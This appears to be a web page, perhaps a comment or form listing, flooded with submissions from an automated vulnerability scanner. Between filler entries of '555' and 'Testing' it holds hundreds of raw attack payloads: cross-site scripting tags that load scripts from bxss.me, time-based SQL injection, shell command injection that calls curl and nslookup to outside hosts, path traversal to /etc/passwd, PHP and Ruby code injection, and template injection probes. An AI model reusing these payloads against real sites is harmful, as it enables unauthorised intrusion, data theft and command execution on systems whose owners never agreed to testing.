555


...
Testing

555


...
Testing

555


...
Testing'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555


...
Testing'"

555


...
Testing

555


...
@@6W69R

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555'"()&%<zzz><ScRiPt >HKgl(9256)</ScRiPt>


...
Testing'"()&%<zzz><ScRiPt >dOue(9663)</ScRiPt>

555


...
Testing

'"()&%<zzz><ScRiPt >HKgl(9221)</ScRiPt>


...
'"()&%<zzz><ScRiPt >dOue(9188)</ScRiPt>

555


...
Testing

555


...
Testing

5559908550


...
Testing9650562

555


...
Testing

bfg8577<s1﹥s2ʺs3ʹhjl8577


...
bfg2756<s1﹥s2ʺs3ʹhjl2756

555


...
Testing

555


...
Testing

<%={{={@{#{${dfb}}%>


...
<%={{={@{#{${dfb}}%>

555


...
Testing

555


...
<th:t="${dfb}#foreach

555


...
Testing

<th:t="${dfb}#foreach


...
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555


...
Testing

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


...
dfb{{98991*97996}}xca

555


...
Testing

dfb{{98991*97996}}xca


...
Testing

555


...
dfb[[${98991*97996}]]xca

555


...
Testing

dfb[[${98991*97996}]]xca


...
Testing

555


...
dfb__${98991*97996}__::.x

555


...
Testing

dfb__${98991*97996}__::.x


...
Testing

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


...
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555


...
Testing

555<ScRiPt >HKgl(9419)</ScRiPt>


...
Testing<ScRiPt >dOue(9157)</ScRiPt>

555


...
Testing

555


...
Testing

555<WR04HJ>NEOZQ[!+!]</WR04HJ>


...
Testing<WC2XX6>AA63V[!+!]</WC2XX6>

555


...
Testing

555


...
Testing<script>dOue(9729)</script>

555


...
Testing<script>dOue(9309)</script>9309

555


...
Testing<ScR<ScRiPt>IpT>dOue(9185)</sCr<ScRiPt>IpT>

555


...
Testing

555


...
Testing

555<script>HKgl(9944)</script>


...
Testing<ScRiPt >dOue(9089)</ScRiPt>

555


...
Testing

555<script>HKgl(9439)</script>9439


...
Testing

555


...
Testing<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9705></ScRiPt>

555


...
Testing

555<ScR<ScRiPt>IpT>HKgl(9707)</sCr<ScRiPt>IpT>


...
Testing<ScRiPt >dOue(9114)</ScRiPt>

555


...
Testing

555<ScRiPt >HKgl(9497)</ScRiPt>


...
Testing

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9335></ScRiPt>


...
Testing<isindex type=image src=1 onerror=dOue(9298)>

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555<ScRiPt >HKgl(9508)</ScRiPt>


...
Testing<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9288'>

555


...
Testing

555


...
Testing<body onload=dOue(9317)>

555


...
Testing

555<isindex type=image src=1 onerror=HKgl(9777)>


...
Testing<img src=//xss.bxss.me/t/dot.gif onload=dOue(9772)>

555


...
Testing

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9193'>


...
Testing<img src=xyz OnErRor=dOue(9173)>

555


...
Testing

555<body onload=HKgl(9339)>


...
Testing

555


...
Testing<img/src=">" onerror=alert(9423)>

555


...
Testing

555


...
Testing

555


...
Testing

555<img src=//xss.bxss.me/t/dot.gif onload=HKgl(9040)>


...
%54%65%73%74%69%6E%67%3C%53%63%52%69%50%74%20%3E%64%4F%75%65%289188%29%3C%2F%73%43%72%69%70%54%3E

555


...
Testing

555<img src=xyz OnErRor=HKgl(9932)>


...
Testing\u003CScRiPt\dOue(9140)\u003C/sCripT\u003E

555


...
Testing

555<img/src=">" onerror=alert(9982)>


...
Testing&lt;ScRiPt&gt;dOue(9317)&lt;/sCripT&gt;

555


...
Testing

%35%35%35%3C%53%63%52%69%50%74%20%3E%48%4B%67%6C%289371%29%3C%2F%73%43%72%69%70%54%3E


...
Testing

555\u003CScRiPt\HKgl(9194)\u003C/sCripT\u003E


...
Testing<input autofocus onfocus=dOue(9386)>

555


...
Testing

555&lt;ScRiPt&gt;HKgl(9081)&lt;/sCripT&gt;


...
<a HrEF=http://xss.bxss.me></a>

555


...
<a HrEF=jaVaScRiPT:>

555


...
Testing

555<input autofocus onfocus=HKgl(9987)>


...
Testing}body{zzz:Expre/**/SSion(dOue(9671))}

555


...
Testing

<a HrEF=http://xss.bxss.me></a>


...
Testing6df4r <ScRiPt >dOue(9794)</ScRiPt>

555


...
Testing

<a HrEF=jaVaScRiPT:>


...
Testing<WHPXBC>MT3VN[!+!]</WHPXBC>

555


...
Testing

555}body{zzz:Expre/**/SSion(HKgl(9637))}


...
Testing<ifRAme sRc=9634.com></IfRamE>

555


...
Testing

555uaeUz <ScRiPt >HKgl(9651)</ScRiPt>


...
Testing

555<WSYI9W>Y36JA[!+!]</WSYI9W>


...
Testing<abVueSu x=9607>

555


...
Testing

555<ifRAme sRc=9513.com></IfRamE>


...
Testing<img sRc='http://attacker-9763/log.php?

555


...
Testing

555<aP4Lxgp x=9021>


...
Testing<aiYmNBX<

555


...
Testing

555<img sRc='http://attacker-9278/log.php?


...
Testing

555<aHAOpsc<


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

1NLLQO8ES0


...
Testing

555


...
1BG8BCM3820

555


...
Testing

555


...
Testing

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


...
Testing

555


...
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555


...
Testing

555


...
Testing

xfs.bxss.me


...
Testing

555


...
xfs.bxss.me

555


...
Testing

555


...
Testing

'"


...
Testing

<!--


...
Testing

555


...
Testing

555


...
'"

555


...
<!--

555


...
Testing

555


...
Testing

555


...
Testing

555'"()&%<zzz><ScRiPt >Yz17(9468)</ScRiPt>


...
Testing

'"()&%<zzz><ScRiPt >Yz17(9759)</ScRiPt>


...
Testing

response.write(9094271*9105156)


...
Testing

'+response.write(9094271*9105156)+'


...
Testing

"+response.write(9094271*9105156)+"


...
Testing

555


...
Testing

555


...
Testing

555


...
response.write(9108784*9401873)

555


...
Testing

5559069435


...
'+response.write(9108784*9401873)+'

555


...
"+response.write(9108784*9401873)+"

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

bfg4447<s1﹥s2ʺs3ʹhjl4447


...
Testing

<%={{={@{#{${dfb}}%>


...
Testing

HkIgNoRz


...
Testing

ICQ5p7ws: p1i5mkdo


...
Testing

555


...
Testing

555


...
UA0Ltszl

555


...
39ahxY0A: 8RlJJptT

555


...
Testing

555


...
Testing

<th:t="${dfb}#foreach


...
Testing

555


...
Testing

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


...
Testing

dfb{{98991*97996}}xca


...
Testing

555


...
Testing

dfb[[${98991*97996}]]xca


...
Testing

dfb__${98991*97996}__::.x


...
Testing

../../../../../../../../../../../../../../etc/passwd


...
Testing

../../../../../../../../../../../../../../windows/win.ini


...
Testing

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


...
Testing

file:///etc/passwd


...
Testing

555


...
Testing

../555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555<ScRiPt >Yz17(9941)</ScRiPt>


...
Testing

555


...
../../../../../../../../../../../../../../etc/passwd

555


...
../../../../../../../../../../../../../../windows/win.ini

555


...
file:///etc/passwd

555


...
Testing

555


...
../Testing

555


...
Testing

555


...
Testing

555<WE7MOW>5PVRH[!+!]</WE7MOW>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555<script>Yz17(9868)</script>


...
Testing

555<esi:include src="http://bxss.me/rpb.png"/>


...
Testing

555


...
Testing<esi:include src="http://bxss.me/rpb.png"/>

555


...
Testing

555


...
Testing

555


...
Testing

555<script>Yz17(9631)</script>9631


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

${10000296+9999840}


...
Testing

echo wshctn$()\ csjdym\nz^xyu||a #' &echo wshctn$()\ csjdym\nz^xyu||a #|" &echo wshctn$()\ csjdym\nz^xyu||a #


...
Testing

555<ScR<ScRiPt>IpT>Yz17(9733)</sCr<ScRiPt>IpT>


...
Testing

555


...
Testing

&echo ubzave$()\ whqehr\nz^xyu||a #' &echo ubzave$()\ whqehr\nz^xyu||a #|" &echo ubzave$()\ whqehr\nz^xyu||a #


...
${9999671+9999736}

555


...
Testing

555&echo ovhavq$()\ apewqq\nz^xyu||a #' &echo ovhavq$()\ apewqq\nz^xyu||a #|" &echo ovhavq$()\ apewqq\nz^xyu||a #


...
Testing

555


...
Testing

|echo agmcdb$()\ czuwkc\nz^xyu||a #' |echo agmcdb$()\ czuwkc\nz^xyu||a #|" |echo agmcdb$()\ czuwkc\nz^xyu||a #


...
Testing

555|echo yleetk$()\ dwvlsl\nz^xyu||a #' |echo yleetk$()\ dwvlsl\nz^xyu||a #|" |echo yleetk$()\ dwvlsl\nz^xyu||a #


...
Testing

expr 9000761156 - 980781


...
Testing

(nslookup -q=cname hitrydhfprdvpae8a1.bxss.me||curl hitrydhfprdvpae8a1.bxss.me))


...
Testing

$(nslookup -q=cname hitjgviwtjrpwf9b08.bxss.me||curl hitjgviwtjrpwf9b08.bxss.me)


...
Testing

555<ScRiPt >Yz17(9975)</ScRiPt>


...
Testing

&nslookup -q=cname hitviaohdpeoq63867.bxss.me&'\"`0&nslookup -q=cname hitviaohdpeoq63867.bxss.me&`'


...
Testing

&(nslookup -q=cname hitmgicfsntxh303a1.bxss.me||curl hitmgicfsntxh303a1.bxss.me)&'\"`0&(nslookup -q=cname hitmgicfsntxh303a1.bxss.me||curl hitmgicfsntxh303a1.bxss.me)&`'


...
Testing

|(nslookup -q=cname hitjxqwklddnd8c10b.bxss.me||curl hitjxqwklddnd8c10b.bxss.me)


...
Testing

`(nslookup -q=cname hitrbwggupcvsf3f5f.bxss.me||curl hitrbwggupcvsf3f5f.bxss.me)`


...
Testing

;(nslookup -q=cname hitlwoqvyfwly41bee.bxss.me||curl hitlwoqvyfwly41bee.bxss.me)|(nslookup -q=cname hitlwoqvyfwly41bee.bxss.me||curl hitlwoqvyfwly41bee.bxss.me)&(nslookup -q=cname hitlwoqvyfwly41bee.bxss.me||curl hitlwoqvyfwly41bee.bxss.me)


...
Testing

|(nslookup${IFS}-q${IFS}cname${IFS}hitdymsizcdyh66e0a.bxss.me||curl${IFS}hitdymsizcdyh66e0a.bxss.me)


...
Testing

&(nslookup${IFS}-q${IFS}cname${IFS}hitmfpopseksk906ed.bxss.me||curl${IFS}hitmfpopseksk906ed.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitmfpopseksk906ed.bxss.me||curl${IFS}hitmfpopseksk906ed.bxss.me)&`'


...
Testing

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9789></ScRiPt>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555<ScRiPt >Yz17(9719)</ScRiPt>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

5559uIvCYME


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

-1 OR 5*5=25 --


...
Testing

555<isindex type=image src=1 onerror=Yz17(9169)>


...
Testing

555


...
Testing

-1 OR 5*5=25


...
echo ydcbmc$()\ cakalh\nz^xyu||a #' &echo ydcbmc$()\ cakalh\nz^xyu||a #|" &echo ydcbmc$()\ cakalh\nz^xyu||a #

555


...
Testing

-1' OR 5*5=25 --


...
&echo fmxxji$()\ qoljgh\nz^xyu||a #' &echo fmxxji$()\ qoljgh\nz^xyu||a #|" &echo fmxxji$()\ qoljgh\nz^xyu||a #

555


...
Testing

-1" OR 5*5=25 --


...
Testing&echo pqomjs$()\ mowgve\nz^xyu||a #' &echo pqomjs$()\ mowgve\nz^xyu||a #|" &echo pqomjs$()\ mowgve\nz^xyu||a #

555


...
Testing

-1' OR 5*5=25 or 'bfcomuKB'='


...
|echo dbgmmw$()\ vkukyz\nz^xyu||a #' |echo dbgmmw$()\ vkukyz\nz^xyu||a #|" |echo dbgmmw$()\ vkukyz\nz^xyu||a #

555


...
Testing

-1" OR 5*5=25 or "CSYKOiBf"="


...
Testing|echo hxiicm$()\ osbzup\nz^xyu||a #' |echo hxiicm$()\ osbzup\nz^xyu||a #|" |echo hxiicm$()\ osbzup\nz^xyu||a #

555


...
Testing

555*if(now()=sysdate(),sleep(15),0)


...
Testing

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z


...
Testing

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z


...
expr 9000654340 - 911843

555


...
Testing

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9479'>


...
(nslookup -q=cname hitarcqkxdzsvc0aaf.bxss.me||curl hitarcqkxdzsvc0aaf.bxss.me))

555


...
Testing

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


...
$(nslookup -q=cname hitpqorzbkwps0821d.bxss.me||curl hitpqorzbkwps0821d.bxss.me)

555


...
&nslookup -q=cname hitzptbobsjkbe444a.bxss.me&'\"`0&nslookup -q=cname hitzptbobsjkbe444a.bxss.me&`'

555


...
Testing

555-1; waitfor delay '0:0:15' --


...
&(nslookup -q=cname hitsgjajbyksk64eb6.bxss.me||curl hitsgjajbyksk64eb6.bxss.me)&'\"`0&(nslookup -q=cname hitsgjajbyksk64eb6.bxss.me||curl hitsgjajbyksk64eb6.bxss.me)&`'

555


...
|(nslookup -q=cname hitfvblakcndhfe5d9.bxss.me||curl hitfvblakcndhfe5d9.bxss.me)

555


...
Testing

555-1); waitfor delay '0:0:15' --


...
`(nslookup -q=cname hithkwhrtpryt657af.bxss.me||curl hithkwhrtpryt657af.bxss.me)`

555


...
;(nslookup -q=cname hitelpcrlkikf35eea.bxss.me||curl hitelpcrlkikf35eea.bxss.me)|(nslookup -q=cname hitelpcrlkikf35eea.bxss.me||curl hitelpcrlkikf35eea.bxss.me)&(nslookup -q=cname hitelpcrlkikf35eea.bxss.me||curl hitelpcrlkikf35eea.bxss.me)

555


...
Testing

555-1 waitfor delay '0:0:15' --


...
|(nslookup${IFS}-q${IFS}cname${IFS}hitdrmnoeajza817b0.bxss.me||curl${IFS}hitdrmnoeajza817b0.bxss.me)

555


...
Testing

555<body onload=Yz17(9575)>


...
Testing

5558PblK36D'; waitfor delay '0:0:15' --


...
&(nslookup${IFS}-q${IFS}cname${IFS}hitwrarcvhxdq8c41e.bxss.me||curl${IFS}hitwrarcvhxdq8c41e.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitwrarcvhxdq8c41e.bxss.me||curl${IFS}hitwrarcvhxdq8c41e.bxss.me)&`'

555


...
Testing

555-1 OR 854=(SELECT 854 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing

555-1) OR 797=(SELECT 797 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing

555-1)) OR 829=(SELECT 829 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing

555InttEVSh' OR 40=(SELECT 40 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing

555


...
Testing

555UlADzmXz') OR 520=(SELECT 520 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing

555<img src=//xss.bxss.me/t/dot.gif onload=Yz17(9404)>


...
Testing

555


...
Testing

5558xCbx3jP')) OR 284=(SELECT 284 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing

555


...
Testing

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


...
Testing

555


...
Testing

555


...
Testing

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


...
Testing

555


...
Testing

555


...
Testing

(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)


...
Testing

555<img src=xyz OnErRor=Yz17(9434)>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555'"


...
Testing

@@yuMKh


...
Testing

(select 198766*667891)


...
Testing

(select 198766*667891 from DUAL)


...
Testing

555


...
Testing

555<img/src=">" onerror=alert(9044)>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


...
Testing

555


...
Testing

%35%35%35%3C%53%63%52%69%50%74%20%3E%59%7A%31%37%289459%29%3C%2F%73%43%72%69%70%54%3E


...
Testing

';print(md5(31337));$a='


...
Testing

555


...
Testing

";print(md5(31337));$a="


...
Testing

555


...
Testing

${@print(md5(31337))}


...
Testing

555


...
Testing

${@print(md5(31337))}\


...
Testing

555


...
Testing

'.print(md5(31337)).'


...
Testing

555


...
Testing

<?php print(md5(31337));?>


...
Testing

555


...
Testing

'{${print(md5(31337))}}'


...
Testing

555


...
Testing

555\u003CScRiPt\Yz17(9209)\u003C/sCripT\u003E


...
Testing

'.gethostbyname(lc('hitsi'.'atykbzxi5d5ca.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(85).chr(103).chr(71).'


...
Testing

print(md5(31337));//


...
Testing

".gethostbyname(lc("hitxd"."tncvhzqv78536.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(73).chr(113).chr(67)."


...
Testing

{php}print(md5(31337));{/php}


...
Testing

555


...
Testing

gethostbyname(lc('hitpd'.'grysucea7549c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(70).chr(99).chr(83)


...
Testing

[php]print(md5(31337));[/php]


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
'.gethostbyname(lc('hitkz'.'hyxrgfji2fa63.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(82).chr(108).chr(67).'

555


...
Testing

555


...
Testing

555


...
".gethostbyname(lc("hitqu"."irruzfpu2b0ad.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(82).chr(115).chr(66)."

555


...
Testing

555


...
Testing

555&lt;ScRiPt&gt;Yz17(9164)&lt;/sCripT&gt;


...
gethostbyname(lc('hitgp'.'lcfiagqy88ead.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(80).chr(103).chr(82)

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555


...
Testing

555


...
';print(md5(31337));$a='

555


...
Testing

555


...
";print(md5(31337));$a="

555


...
Testing

555


...
${@print(md5(31337))}

555


...
Testing

555<input autofocus onfocus=Yz17(9830)>


...
Testing

555


...
${@print(md5(31337))}\

555


...
Testing4shOT7Yw

555


...
'.print(md5(31337)).'

555


...
Testing

555


...
<?php print(md5(31337));?>

555


...
-1 OR 5*5=25 --

555


...
'{${print(md5(31337))}}'

555


...
-1 OR 5*5=25

555


...
print(md5(31337));//

555


...
-1' OR 5*5=25 --

555


...
{php}print(md5(31337));{/php}

555


...
-1" OR 5*5=25 --

555


...
[php]print(md5(31337));[/php]

555


...
Testing

555


...
Testing

555


...
-1' OR 5*5=25 or 'XgRJjHJE'='

555


...
Testing

555


...
-1" OR 5*5=25 or "mcoUEhAV"="

555


...
Testing

555


...
if(now()=sysdate(),sleep(15),0)

555


...
Testing

555


...
Testing0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555


...
Testing

555


...
Testing

555


...
Testing

<a HrEF=http://xss.bxss.me></a>


...
Testing0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

555


...
Testing

555


...
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555


...
Testing

555


...
Testing-1 waitfor delay '0:0:15' --

555


...
Testing

555


...
Testing

555


...
TestinguO5L9Dix'; waitfor delay '0:0:15' --

555


...
Testing5QDp7XGN' OR 968=(SELECT 968 FROM PG_SLEEP(15))--

555


...
TestingwIqb0w71') OR 149=(SELECT 149 FROM PG_SLEEP(15))--

555


...
Testing5xK50SBC')) OR 804=(SELECT 804 FROM PG_SLEEP(15))--

555


...
Testing'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555


...
Testing

<a HrEF=jaVaScRiPT:>


...
(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)

555


...
Testing

555


...
Testing'"

555


...
@@VID03

555


...
(select 198766*667891)

555


...
(select 198766*667891 from DUAL)

555


...
Testing

555


...
Testing

555}body{zzz:Expre/**/SSion(Yz17(9010))}


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555PugoA <ScRiPt >Yz17(9465)</ScRiPt>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555<WTBYLM>GBUE2[!+!]</WTBYLM>


...
Testing

555


...
Testing

HttP://bxss.me/t/xss.html?%00


...
Testing

bxss.me/t/xss.html?%00


...
Testing

555


...
Testing

http://bxss.me/t/rfi.php?%00


...
Testing

555


...
Testing

bxss.me/t/rfi.php?%00


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555<ifRAme sRc=9243.com></IfRamE>


...
Testing

555


...
HttP://bxss.me/t/xss.html?%00

555


...
Testing

555


...
bxss.me/t/xss.html?%00

555


...
http://bxss.me/t/rfi.php?%00

555


...
Testing

555


...
bxss.me/t/rfi.php?%00

555


...
Testing

555


...
Testing

555


...
Testing

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg


...
Testing

555


...
Testing

555


...
Testing

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg


...
Testing

555


...
Testing

555<aNjTSgP x=9068>


...
Testing

555


...
Testing

/etc/shells


...
Testing

555


...
Testing

../../../../../../../../../../../../../../etc/shells


...
Testing

555


...
Testing

c:/windows/win.ini


...
Testing

555


...
Testing

bxss.me


...
Testing

555


...
Testing

Http://bxss.me/t/fit.txt


...
Testing

http://bxss.me/t/fit.txt?.jpg


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555<img sRc='http://attacker-9062/log.php?


...
Testing

555


...
Testing

555


...
Testing

555


...
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555


...
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

555


...
/etc/shells

555


...
../../../../../../../../../../../../../../etc/shells

555


...
c:/windows/win.ini

555


...
bxss.me

555


...
Http://bxss.me/t/fit.txt

555


...
http://bxss.me/t/fit.txt?.jpg

555


...
Testing

555


...
Testing

555<aQYrYk4<


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

"+"A".concat(70-3).concat(22*4).concat(110).concat(76).concat(98).concat(87)+(require"socket" Socket.gethostbyname("hithe"+"hndkdjjfa7d87.bxss.me.")[3].to_s)+"


...
Testing

555


...
Testing

'+'A'.concat(70-3).concat(22*4).concat(122).concat(84).concat(101).concat(88)+(require'socket' Socket.gethostbyname('hitur'+'wethyqkjd99a0.bxss.me.')[3].to_s)+'


...
Testing

'A'.concat(70-3).concat(22*4).concat(112).concat(73).concat(114).concat(85)+(require'socket' Socket.gethostbyname('hitrd'+'pvvxiwkbd1d90.bxss.me.')[3].to_s)


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

1


...
"+"A".concat(70-3).concat(22*4).concat(120).concat(65).concat(114).concat(87)+(require"socket" Socket.gethostbyname("hitdc"+"jvgrjslwda714.bxss.me.")[3].to_s)+"

555


...
Testing

1


...
Testing

redirtest.acx


...
'+'A'.concat(70-3).concat(22*4).concat(97).concat(82).concat(116).concat(86)+(require'socket' Socket.gethostbyname('hitrm'+'mwotsypa9d6ef.bxss.me.')[3].to_s)+'

555


...
Testing

555


...
Testing

1/.


...
'A'.concat(70-3).concat(22*4).concat(114).concat(79).concat(111).concat(72)+(require'socket' Socket.gethostbyname('hitno'+'bttbevdy79e0d.bxss.me.')[3].to_s)

555


...
redirtest.acx

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
1

555


...
Testing

555


...
1

555


...
1/.

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555&n980179=v947117


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing'"()&%<zzz><ScRiPt >Yz17(9412)</ScRiPt>

555


...
Testing&n975689=v910492

555


...
Testing

)


...
Testing

!(()&&!|*|*|


...
'"()&%<zzz><ScRiPt >Yz17(9155)</ScRiPt>

555


...
Testing

^(#$!@#$)(()))******


...
Testing

555


...
Testing

555


...
Testing

555


...
)

555


...
Testing

555


...
!(()&&!|*|*|

555


...
^(#$!@#$)(()))******

555


...
Testing9403103

555


...
Testing

555


...
Testing

555


...
Testing

555


...
bfg3177<s1﹥s2ʺs3ʹhjl3177

555


...
<%={{={@{#{${dfb}}%>

555


...
<th:t="${dfb}#foreach

555


...
Testing

555


...
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555


...
Testing

'"()


...
Testing

555'&&sleep(27*1000)*xiopqa&&'


...
Testing

555"&&sleep(27*1000)*ltnivh&&"


...
Testing

555'||sleep(27*1000)*suxezs||'


...
Testing

555"||sleep(27*1000)*wzmldu||"


...
dfb{{98991*97996}}xca

555


...
Testing

555


...
dfb[[${98991*97996}]]xca

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
dfb__${98991*97996}__::.x

555


...
Testing

555


...
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555


...
'"()

555


...
Testing'&&sleep(27*1000)*taklfq&&'

555


...
Testing"&&sleep(27*1000)*ajiszq&&"

555


...
Testing<ScRiPt >Yz17(9876)</ScRiPt>

555


...
Testing'||sleep(27*1000)*tedkmx||'

555


...
Testing"||sleep(27*1000)*geahtr||"

555


...
Testing<WIGDEJ>CFPFN[!+!]</WIGDEJ>

555


...
Testing

555


...
Testing<script>Yz17(9015)</script>

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing<script>Yz17(9547)</script>9547

555


...
Testing<ScR<ScRiPt>IpT>Yz17(9112)</sCr<ScRiPt>IpT>

555


...
Testing<ScRiPt >Yz17(9847)</ScRiPt>

555


...
Testing<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9325></ScRiPt>

555


...
Testing<ScRiPt >Yz17(9818)</ScRiPt>

555


...
Testing<isindex type=image src=1 onerror=Yz17(9293)>

555


...
Testing<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9175'>

555


...
Testing

555


...
Testing<body onload=Yz17(9084)>

555


...
Testing<img src=//xss.bxss.me/t/dot.gif onload=Yz17(9206)>

555


...
Testing<img src=xyz OnErRor=Yz17(9910)>

555


...
Testing<img/src=">" onerror=alert(9815)>

555


...
%54%65%73%74%69%6E%67%3C%53%63%52%69%50%74%20%3E%59%7A%31%37%289154%29%3C%2F%73%43%72%69%70%54%3E

555


...
Testing

555


...
Testing\u003CScRiPt\Yz17(9203)\u003C/sCripT\u003E

555


...
Testing

555


...
Testing&lt;ScRiPt&gt;Yz17(9140)&lt;/sCripT&gt;

555


...
Testing

5558aSphU5b


...
Testing<input autofocus onfocus=Yz17(9199)>

555


...
Testing

555


...
Testing

-1 OR 5*5=25 --


...
Testing

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


...
Testing

-1 OR 5*5=25


...
Testing

555


...
Testing

-1' OR 5*5=25 --


...
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555


...
Testing

-1" OR 5*5=25 --


...
<a HrEF=http://xss.bxss.me></a>

555


...
Testing

555


...
Testing

-1' OR 5*5=25 or '6uFdD0fP'='


...
Testing

-1" OR 5*5=25 or "LcHkRztn"="


...
Testing

xfs.bxss.me


...
Testing

555


...
xfs.bxss.me

555


...
Testing

555


...
Testing

555*if(now()=sysdate(),sleep(15),0)


...
Testing

'"


...
Testing

<!--


...
Testing

555


...
Testing

555


...
'"

555


...
<!--

555


...
<a HrEF=jaVaScRiPT:>

555


...
Testing

555


...
Testing

555


...
Testing

555'"()&%<zzz><ScRiPt >BL6v(9100)</ScRiPt>


...
Testing

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z


...
